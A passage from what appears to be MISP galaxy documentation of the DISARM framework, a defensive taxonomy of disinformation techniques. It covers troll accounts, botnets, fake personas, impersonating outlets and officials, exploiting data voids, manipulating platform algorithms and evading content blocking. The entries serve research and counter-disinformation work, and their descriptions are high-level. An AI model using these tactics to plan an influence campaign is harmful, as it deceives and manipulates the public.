An influence operation may hire trolls, or human operators of fake accounts that aim to provoke others by posting and amplifying content about controversial issues. Trolls can serve to discredit an influence operation’s opposition or bring attention to the operation’s cause through debate. Classic trolls refer to regular people who troll for personal reasons, such as attention-seeking or boredom. Classic trolls may advance operation narratives by coincidence but are not directly affiliated with any larger operation. Conversely, hybrid trolls act on behalf of another institution, such as a state or financial organisation, and post content with a specific ideological goal. Hybrid trolls may be highly advanced and institutionalised or less organised and work for a single individual.

The tag is: misp-galaxy:disarm-techniques="Enlist Troll Accounts"

Table 1380. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0091.003.md

Build Network

Operators build their own network, creating links between accounts — whether authentic or inauthentic — in order to amplify and promote narratives and artefacts, and to encourage further growth of their network, as well as the ongoing sharing of and engagement with operational content.

The tag is: misp-galaxy:disarm-techniques="Build Network"

Table 1381. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.md

Create Organisations

Influence operations may establish organisations with legitimate or falsified hierarchies, staff, and content to structure operation assets, provide a sense of legitimacy to the operation, or provide institutional backing to operation activities.

The tag is: misp-galaxy:disarm-techniques="Create Organisations"

Table 1382. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.001.md

Use Follow Trains

A follow train is a group of people who follow each other on a social media platform, often as a way for an individual or campaign to grow its social media following. Follow trains may be a violation of platform Terms of Service. They are also known as follow-for-follow groups.

The tag is: misp-galaxy:disarm-techniques="Use Follow Trains"

Table 1383. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.002.md

Create Community or Sub-Group

When there is not an existing community or sub-group that meets a campaign’s goals, an influence operation may seek to create a community or sub-group.

The tag is: misp-galaxy:disarm-techniques="Create Community or Sub-Group"

Table 1384. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0092.003.md

Acquire/Recruit Network

Operators acquire an existing network by paying, recruiting, or exerting control over the leaders of the existing network.

The tag is: misp-galaxy:disarm-techniques="Acquire/Recruit Network"

Table 1385. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.md

Fund Proxies

An influence operation may fund proxies, or external entities that work for the operation. An operation may recruit/train users with existing sympathies towards the operation’s narratives and/or goals as proxies. Funding proxies serves various purposes including:

- Diversifying operation locations to complicate attribution
- Reducing the workload for direct operation assets

The tag is: misp-galaxy:disarm-techniques="Fund Proxies"

Table 1386. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.001.md

Acquire Botnets

A botnet is a group of bots that can function in coordination with each other.

The tag is: misp-galaxy:disarm-techniques="Acquire Botnets"

Table 1387. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0093.002.md

Infiltrate Existing Networks

Operators deceptively insert social assets into existing networks as group members in order to influence the members of the network and the wider information environment that the network impacts.

The tag is: misp-galaxy:disarm-techniques="Infiltrate Existing Networks"

Table 1388. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.md

Identify Susceptible Targets in Networks

When seeking to infiltrate an existing network, an influence operation may identify individuals and groups that might be susceptible to being co-opted or influenced.

The tag is: misp-galaxy:disarm-techniques="Identify Susceptible Targets in Networks"

Table 1389. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.001.md

Utilise Butterfly Attacks

Butterfly attacks occur when operators pretend to be members of a certain social group, usually a group that struggles for representation. An influence operation may mimic a group to insert controversial statements into the discourse, encourage the spread of operation content, or promote harassment among group members. Unlike astroturfing, butterfly attacks aim to infiltrate and discredit existing grassroots movements, organisations, and media campaigns.

The tag is: misp-galaxy:disarm-techniques="Utilise Butterfly Attacks"

Table 1390. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0094.002.md

Develop Owned Media Assets

An owned media asset refers to an agency or organisation through which an influence operation may create, develop, and host content and narratives. Owned media assets include websites, blogs, social media pages, forums, and other platforms that facilitate the creation and organisation of content.

The tag is: misp-galaxy:disarm-techniques="Develop Owned Media Assets"

Table 1391. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0095.md

Leverage Content Farms

Using the services of large-scale content providers for creating and amplifying campaign artefacts at scale.

The tag is: misp-galaxy:disarm-techniques="Leverage Content Farms"

Table 1392. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.md

Create Content Farms

An influence operation may create an organisation for creating and amplifying campaign artefacts at scale.

The tag is: misp-galaxy:disarm-techniques="Create Content Farms"

Table 1393. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.001.md

Outsource Content Creation to External Organisations

An influence operation may outsource content creation to external companies to avoid attribution, increase the rate of content creation, or improve content quality, e.g., by employing an organisation that can create content in the target audience’s native language. Employed organisations may include marketing companies for tailored advertisements or external content farms for high volumes of targeted media.

The tag is: misp-galaxy:disarm-techniques="Outsource Content Creation to External Organisations"

Table 1394. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0096.002.md

Create Personas

Creating fake people, often with accounts across multiple platforms. These personas can be as simple as a name, can contain slightly more background like location, profile pictures, backstory, or can be effectively backstopped with indicators like fake identity documents.

The tag is: misp-galaxy:disarm-techniques="Create Personas"

Table 1395. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0097.md

Produce Evidence for Persona

People may produce evidence which supports the persona they are deploying (T0097) (aka “backstopping” the persona).

This Technique covers situations where evidence is developed or produced as part of an influence operation to increase the perceived legitimacy of a persona used during IO, including creating accounts for the same persona on multiple platforms.

The use of personas (T0097), and providing evidence to improve people’s perception of one’s persona (T0097.001), are not necessarily malicious or inauthentic. However, sometimes people use personas to increase the perceived legitimacy of narratives for malicious purposes.

This Technique was previously called Backstop Personas.

The tag is: misp-galaxy:disarm-techniques="Produce Evidence for Persona"

Table 1396. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0097.001.md

Establish Inauthentic News Sites

Modern computational propaganda makes use of a cadre of imposter news sites spreading globally. These sites, sometimes motivated by concerns other than propaganda — for instance, click-based revenue — often have some superficial markers of authenticity, such as naming and site design. But many can be quickly exposed with reference to their ownership, reporting history and advertising details.

The tag is: misp-galaxy:disarm-techniques="Establish Inauthentic News Sites"

Table 1397. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.md

Create Inauthentic News Sites

Create Inauthentic News Sites

The tag is: misp-galaxy:disarm-techniques="Create Inauthentic News Sites"

Table 1398. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.001.md

Leverage Existing Inauthentic News Sites

Leverage Existing Inauthentic News Sites

The tag is: misp-galaxy:disarm-techniques="Leverage Existing Inauthentic News Sites"

Table 1399. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0098.002.md

Impersonate Existing Entity

An influence operation may prepare assets impersonating existing entities (both organisations and people) to further conceal its network identity and add a layer of legitimacy to its operation content. Existing entities may include authentic news outlets, public figures, organisations, or state entities. 

Users will more likely believe and less likely fact-check news from recognisable sources rather than unknown sites. 

An influence operation may use a wide variety of cyber techniques to impersonate a legitimate entity’s website or social media account. 

This Technique was previously called Prepare Assets Impersonating Legitimate Entities.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Entity"

Table 1400. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.md

Spoof/Parody Account/Site

An influence operation may prepare assets impersonating legitimate entities to further conceal its network identity and add a layer of legitimacy to its operation content. Users will more likely believe and less likely fact-check news from recognisable sources rather than unknown sites. Legitimate entities may include authentic news outlets, public figures, organisations, or state entities.

The tag is: misp-galaxy:disarm-techniques="Spoof/Parody Account/Site"

Table 1401. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.002.md

Impersonate Existing Organisation

A situation where a threat actor styles their online assets or content to mimic an existing organisation.

This can be done to take advantage of people’s trust in the organisation to increase narrative believability, to smear the organisation, or to make the organisation less trustworthy.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Organisation"

Table 1402. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.003.md

Impersonate Existing Media Outlet

A situation where a threat actor styles their online assets or content to mimic an existing media outlet.

This can be done to take advantage of people’s trust in the outlet to increase narrative believability, to smear the outlet, or to make the outlet less trustworthy.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Media Outlet"

Table 1403. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.004.md

Impersonate Existing Official

A situation where a threat actor styles their online assets or content to impersonate an official (including government officials, organisation officials, etc.).

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Official"

Table 1404. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.005.md

Impersonate Existing Influencer

A situation where a threat actor styles their online assets or content to impersonate an influencer or celebrity, typically to exploit users’ existing faith in the impersonated target.

The tag is: misp-galaxy:disarm-techniques="Impersonate Existing Influencer"

Table 1405. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0099.006.md

Co-Opt Trusted Sources

An influence operation may co-opt trusted sources by infiltrating or repurposing a source to reach a target audience through existing, previously reliable networks. Co-opted trusted sources may include:

- National or local news outlets
- Research or academic publications
- Online blogs or websites

The tag is: misp-galaxy:disarm-techniques="Co-Opt Trusted Sources"

Table 1406. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.md

Co-Opt Trusted Individuals

Co-Opt Trusted Individuals

The tag is: misp-galaxy:disarm-techniques="Co-Opt Trusted Individuals"

Table 1407. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.001.md

Co-Opt Grassroots Groups

Co-Opt Grassroots Groups

The tag is: misp-galaxy:disarm-techniques="Co-Opt Grassroots Groups"

Table 1408. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.002.md

Co-Opt Influencers

Co-opt Influencers

The tag is: misp-galaxy:disarm-techniques="Co-Opt Influencers"

Table 1409. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0100.003.md

Create Localised Content

Localised content refers to content that appeals to a specific community of individuals, often in defined geographic areas. An operation may create localised content using local language and dialects to resonate with its target audience and blend in with other local news and social media. Localised content may help an operation increase legitimacy, avoid detection, and complicate external attribution.

The tag is: misp-galaxy:disarm-techniques="Create Localised Content"

Table 1410. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0101.md

Leverage Echo Chambers/Filter Bubbles

An echo chamber refers to an internet subgroup, often along ideological lines, where individuals only engage with “others with which they are already in agreement.” A filter bubble refers to an algorithm’s placement of an individual in content that they agree with or regularly engage with, possibly entrapping the user into a bubble of their own making. An operation may create these isolated areas of the internet by matching existing groups, or by aggregating individuals into a single target audience based on shared interests, politics, values, demographics, and other characteristics. Echo chambers and filter bubbles help to reinforce similar biases and content to the same target audience members.

The tag is: misp-galaxy:disarm-techniques="Leverage Echo Chambers/Filter Bubbles"

Table 1411. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.md

Use Existing Echo Chambers/Filter Bubbles

Use existing Echo Chambers/Filter Bubbles

The tag is: misp-galaxy:disarm-techniques="Use Existing Echo Chambers/Filter Bubbles"

Table 1412. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.001.md

Create Echo Chambers/Filter Bubbles

Create Echo Chambers/Filter Bubbles

The tag is: misp-galaxy:disarm-techniques="Create Echo Chambers/Filter Bubbles"

Table 1413. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.002.md

Exploit Data Voids

A data void refers to a word or phrase that results in little, manipulative, or low-quality search engine data. Data voids are hard to detect and relatively harmless until exploited by an entity aiming to quickly proliferate false or misleading information during a phenomenon that causes a high number of individuals to query the term or phrase. In the Plan phase, an influence operation may identify data voids for later exploitation in the operation. A 2019 report by Michael Golebiewski identifies five types of data voids. (1) “Breaking news” data voids occur when a keyword gains popularity during a short period of time, allowing an influence operation to publish false content before legitimate news outlets have an opportunity to publish relevant information. (2) An influence operation may create a “strategic new terms” data void by creating their own terms and publishing information online before promoting their keyword to the target audience. (3) An influence operation may publish content on “outdated terms” that have decreased in popularity, capitalising on most search engines’ preferences for recency. (4) “Fragmented concepts” data voids separate connections between similar ideas, isolating segment queries to distinct search engine results. (5) An influence operation may use “problematic queries” that previously resulted in disturbing or inappropriate content to promote messaging until mainstream media recontextualizes the term.

The tag is: misp-galaxy:disarm-techniques="Exploit Data Voids"

Table 1414. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0102.003.md

Livestream

A livestream refers to an online broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Livestream"

Table 1415. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.md

Video Livestream

A video livestream refers to an online video broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Video Livestream"

Table 1416. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.001.md

Audio Livestream

An audio livestream refers to an online audio broadcast capability that allows for real-time communication to closed or open networks.

The tag is: misp-galaxy:disarm-techniques="Audio Livestream"

Table 1417. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0103.002.md

Social Networks

Social media are interactive digital channels that facilitate the creation and sharing of information, ideas, interests, and other forms of expression through virtual communities and networks.

The tag is: misp-galaxy:disarm-techniques="Social Networks"

Table 1418. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.md

Mainstream Social Networks

Examples include Facebook, Twitter, LinkedIn, etc.

The tag is: misp-galaxy:disarm-techniques="Mainstream Social Networks"

Table 1419. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.001.md

Dating App

“Dating App” refers to any platform (or platform feature) whose ostensible purpose is for users to develop a physical/romantic relationship with other users.

Threat Actors can exploit users’ quest for love to trick them into doing things like revealing sensitive information or giving them money.

Examples include Tinder, Bumble, Grindr, Facebook Dating, Tantan, Badoo, Plenty of Fish, Hinge, LOVOO, OkCupid, happn, and Mamba.

The tag is: misp-galaxy:disarm-techniques="Dating App"

Table 1420. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.002.md

Private/Closed Social Networks

Social networks that are not open to people outside of family, friends, neighbours, or co-workers. Non-work-related examples include Couple, FamilyWall, 23snaps, and Nextdoor. Some of the larger social network platforms enable closed communities: examples are Instagram Close Friends and Twitter (X) Circle. Work-related examples of private social networks include LinkedIn, Facebook Workplace, and enterprise communication platforms such as Slack or Microsoft Teams.

The tag is: misp-galaxy:disarm-techniques="Private/Closed Social Networks"

Table 1421. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.003.md

Interest-Based Networks

Examples include smaller and niche networks including Gettr, Truth Social, Parler, etc.

The tag is: misp-galaxy:disarm-techniques="Interest-Based Networks"

Table 1422. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.004.md

Use Hashtags

Use a dedicated, existing hashtag for the campaign/incident.

The tag is: misp-galaxy:disarm-techniques="Use Hashtags"

Table 1423. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.005.md

Create Dedicated Hashtag

Create a campaign/incident specific hashtag.

The tag is: misp-galaxy:disarm-techniques="Create Dedicated Hashtag"

Table 1424. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0104.006.md

Media Sharing Networks

Media sharing networks refer to services whose primary function is the hosting and sharing of specific forms of media. Examples include Instagram, Snapchat, TikTok, YouTube, and SoundCloud.

The tag is: misp-galaxy:disarm-techniques="Media Sharing Networks"

Table 1425. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.md

Photo Sharing

Examples include Instagram, Snapchat, Flickr, etc.

The tag is: misp-galaxy:disarm-techniques="Photo Sharing"

Table 1426. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.001.md

Video Sharing

Examples include YouTube, TikTok, ShareChat, Rumble, etc.

The tag is: misp-galaxy:disarm-techniques="Video Sharing"

Table 1427. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.002.md

Audio Sharing

Examples include podcasting apps, SoundCloud, etc.

The tag is: misp-galaxy:disarm-techniques="Audio Sharing"

Table 1428. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0105.003.md

Discussion Forums

Platforms for finding, discussing, and sharing information and opinions. Examples include Reddit, Quora, Digg, message boards, interest-based discussion forums, etc.

The tag is: misp-galaxy:disarm-techniques="Discussion Forums"

Table 1429. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0106.md

Anonymous Message Boards

Examples include the Chans.

The tag is: misp-galaxy:disarm-techniques="Anonymous Message Boards"

Table 1430. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0106.001.md

Bookmarking and Content Curation

Platforms for searching, sharing, and curating content and media. Examples include Pinterest, Flipboard, etc.

The tag is: misp-galaxy:disarm-techniques="Bookmarking and Content Curation"

Table 1431. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0107.md

Blogging and Publishing Networks

Examples include WordPress, Blogger, Weebly, Tumblr, Medium, etc.

The tag is: misp-galaxy:disarm-techniques="Blogging and Publishing Networks"

Table 1432. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0108.md

Consumer Review Networks

Platforms for finding, reviewing, and sharing information about brands, products, services, restaurants, travel destinations, etc. Examples include Yelp, TripAdvisor, etc.

The tag is: misp-galaxy:disarm-techniques="Consumer Review Networks"

Table 1433. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0109.md

Formal Diplomatic Channels

Leveraging formal, traditional, diplomatic channels to communicate with foreign governments (written documents, meetings, summits, diplomatic visits, etc). This type of diplomacy is conducted by diplomats of one nation with diplomats and other officials of another nation or international organisation.

The tag is: misp-galaxy:disarm-techniques="Formal Diplomatic Channels"

Table 1434. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0110.md

Traditional Media

Examples include TV, Newspaper, Radio, etc.

The tag is: misp-galaxy:disarm-techniques="Traditional Media"

Table 1435. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.md

TV

TV

The tag is: misp-galaxy:disarm-techniques="TV"

Table 1436. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.001.md

Newspaper

Newspaper

The tag is: misp-galaxy:disarm-techniques="Newspaper"

Table 1437. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.002.md

Radio

Radio

The tag is: misp-galaxy:disarm-techniques="Radio"

Table 1438. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0111.003.md

Email

Delivering content and narratives via email. This can include using list management or high-value individually targeted messaging.

The tag is: misp-galaxy:disarm-techniques="Email"

Table 1439. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0112.md

Employ Commercial Analytic Firms

Commercial analytic firms collect data on target audience activities and evaluate the data to detect trends, such as content receiving high click-rates. An influence operation may employ commercial analytic firms to facilitate external collection on its target audience, complicating attribution efforts and better tailoring the content to audience preferences.

The tag is: misp-galaxy:disarm-techniques="Employ Commercial Analytic Firms"

Table 1440. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0113.md

Deliver Ads

Delivering content via any form of paid media or advertising.

The tag is: misp-galaxy:disarm-techniques="Deliver Ads"

Table 1441. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0114.md

Social Media

Social Media

The tag is: misp-galaxy:disarm-techniques="Social Media"

Table 1442. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0114.001.md

Post Content

Delivering content by posting via owned media (assets that the operator controls).

The tag is: misp-galaxy:disarm-techniques="Post Content"

Table 1443. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.md

Share Memes

Memes are one of the most important single artefact types in all of computational propaganda. In this framework, "memes" denotes the narrow image-based definition. But that naming is no accident, as these items have most of the important properties of Dawkins' original conception as a self-replicating unit of culture. Memes pull together reference and commentary; image and narrative; emotion and message. Memes are a powerful tool and the heart of modern influence campaigns.

The tag is: misp-galaxy:disarm-techniques="Share Memes"

Table 1444. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.001.md

Post Violative Content to Provoke Takedown and Backlash

Post Violative Content to Provoke Takedown and Backlash.

The tag is: misp-galaxy:disarm-techniques="Post Violative Content to Provoke Takedown and Backlash"

Table 1445. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.002.md

One-Way Direct Posting

Direct posting refers to a method of posting content via a one-way messaging service, where the recipient cannot directly respond to the poster’s messaging. An influence operation may post directly to promote operation narratives to the target audience without allowing opportunities for fact-checking or disagreement, creating a false sense of support for the narrative.

The tag is: misp-galaxy:disarm-techniques="One-Way Direct Posting"

Table 1446. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0115.003.md

Comment or Reply on Content

Delivering content by replying or commenting via owned media (assets that the operator controls).

The tag is: misp-galaxy:disarm-techniques="Comment or Reply on Content"

Table 1447. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0116.md

Post Inauthentic Social Media Comment

Use government-paid social media commenters, astroturfers, or chat bots (programmed to reply to specific keywords/hashtags) to influence online conversations, product reviews, and website comment forums.

The tag is: misp-galaxy:disarm-techniques="Post Inauthentic Social Media Comment"

Table 1448. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0116.001.md

Attract Traditional Media

Deliver content by attracting the attention of traditional media (earned media).

The tag is: misp-galaxy:disarm-techniques="Attract Traditional Media"

Table 1449. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0117.md

Amplify Existing Narrative

An influence operation may amplify existing narratives that align with its narratives to support operation objectives.

The tag is: misp-galaxy:disarm-techniques="Amplify Existing Narrative"

Table 1450. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0118.md

Cross-Posting

Cross-posting refers to posting the same message to multiple internet discussions, social media platforms or accounts, or newsgroups at one time. An influence operation may post content online in multiple communities and platforms to increase the chances of content exposure to the target audience.

The tag is: misp-galaxy:disarm-techniques="Cross-Posting"

Table 1451. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.md

Post across Groups

An influence operation may post content across groups to spread narratives and content to new communities within the target audiences or to new target audiences.

The tag is: misp-galaxy:disarm-techniques="Post across Groups"

Table 1452. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.001.md

Post across Platform

An influence operation may post content across platforms to spread narratives and content to new communities within the target audiences or to new target audiences. Posting across platforms can also remove opposition and context, helping the narrative spread with less opposition on the cross-posted platform.

The tag is: misp-galaxy:disarm-techniques="Post across Platform"

Table 1453. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.002.md

Post across Disciplines

Post Across Disciplines

The tag is: misp-galaxy:disarm-techniques="Post across Disciplines"

Table 1454. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0119.003.md

Incentivize Sharing

Incentivizing content sharing refers to actions that encourage users to share content themselves, reducing the need for the operation itself to post and promote its own content.

The tag is: misp-galaxy:disarm-techniques="Incentivize Sharing"

Table 1455. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.md

Use Affiliate Marketing Programmes

Use Affiliate Marketing Programmes

The tag is: misp-galaxy:disarm-techniques="Use Affiliate Marketing Programmes"

Table 1456. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.001.md

Use Contests and Prizes

Use Contests and Prizes

The tag is: misp-galaxy:disarm-techniques="Use Contests and Prizes"

Table 1457. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0120.002.md

Manipulate Platform Algorithm

Manipulating a platform algorithm refers to conducting activity on a platform in a way that intentionally targets its underlying algorithm. After analysing a platform’s algorithm (see: Select Platforms), an influence operation may use a platform in a way that increases its content exposure, avoids content removal, or otherwise benefits the operation’s strategy. For example, an influence operation may use bots to amplify its posts so that the platform’s algorithm recognises engagement with operation content and further promotes the content on user timelines.

The tag is: misp-galaxy:disarm-techniques="Manipulate Platform Algorithm"

Table 1458. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0121.md

Bypass Content Blocking

Bypassing content blocking refers to actions taken to circumvent network security measures that prevent users from accessing certain servers, resources, or other online spheres. An influence operation may bypass content blocking to proliferate its content on restricted areas of the internet. Common strategies for bypassing content blocking include:

- Altering IP addresses to avoid IP filtering
- Using a Virtual Private Network (VPN) to avoid IP filtering
- Using a Content Delivery Network (CDN) to avoid IP filtering
- Enabling encryption to bypass packet inspection blocking
- Manipulating text to avoid filtering by keywords
- Posting content on multiple platforms to avoid platform-specific removals
- Using local facilities or modified DNS servers to avoid DNS filtering

The tag is: misp-galaxy:disarm-techniques="Bypass Content Blocking"

Table 1459. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0121.001.md

Direct Users to Alternative Platforms

Directing users to alternative platforms refers to encouraging users to move from the platform on which they initially viewed operation content and engage with content on alternate information channels, including separate social media channels and inauthentic websites. An operation may drive users to alternative platforms to diversify its information channels and ensure the target audience knows where to access operation content if the initial platform suspends, flags, or otherwise removes original operation assets and content.

The tag is: misp-galaxy:disarm-techniques="Direct Users to Alternative Platforms"

Table 1460. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0122.md

Control Information Environment through Offensive Cyberspace Operations

Controlling the information environment through offensive cyberspace operations uses cyber tools and techniques to alter the trajectory of content in the information space to either prioritise operation messaging or block opposition messaging.

The tag is: misp-galaxy:disarm-techniques="Control Information Environment through Offensive Cyberspace Operations"

Table 1461. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.md

Delete Opposing Content

Deleting opposing content refers to the removal of content that conflicts with operational narratives from selected platforms. An influence operation may delete opposing content to censor contradictory information from the target audience, allowing operation narratives to take priority in the information space.

The tag is: misp-galaxy:disarm-techniques="Delete Opposing Content"

Table 1462. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.001.md

Block Content

Content blocking refers to actions taken to restrict internet access or render certain areas of the internet inaccessible. An influence operation may restrict content based on both network and content attributes.

The tag is: misp-galaxy:disarm-techniques="Block Content"

Table 1463. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.002.md

Destroy Information Generation Capabilities

Destroying information generation capabilities refers to actions taken to limit, degrade, or otherwise incapacitate an actor’s ability to generate conflicting information. An influence operation may destroy an actor’s information generation capabilities by physically dismantling the information infrastructure, disconnecting resources needed for information generation, or redirecting information generation personnel. An operation may destroy an adversary’s information generation capabilities to limit conflicting content exposure to the target audience and crowd the information space with its own narratives.

The tag is: misp-galaxy:disarm-techniques="Destroy Information Generation Capabilities"

Table 1464. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.003.md

Conduct Server Redirect

A server redirect, also known as a URL redirect, occurs when a server automatically forwards a user from one URL to another using server-side or client-side scripting languages. An influence operation may conduct a server redirect to divert target audience members from one website to another without their knowledge. The redirected website may pose as a legitimate source, host malware, or otherwise aid operation objectives.

The tag is: misp-galaxy:disarm-techniques="Conduct Server Redirect"

Table 1465. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/techniques/T0123.004.md

Suppress Opposition

Operators can suppress the opposition by exploiting platform content moderation tools and processes, for example by reporting non-violative content to platforms for takedown, or by goading opposition actors into taking actions that result in platform action or target audience disapproval.

The tag is: misp-galaxy:disarm-techniques="Suppress Opposition"

Table 1466. Table References

Links

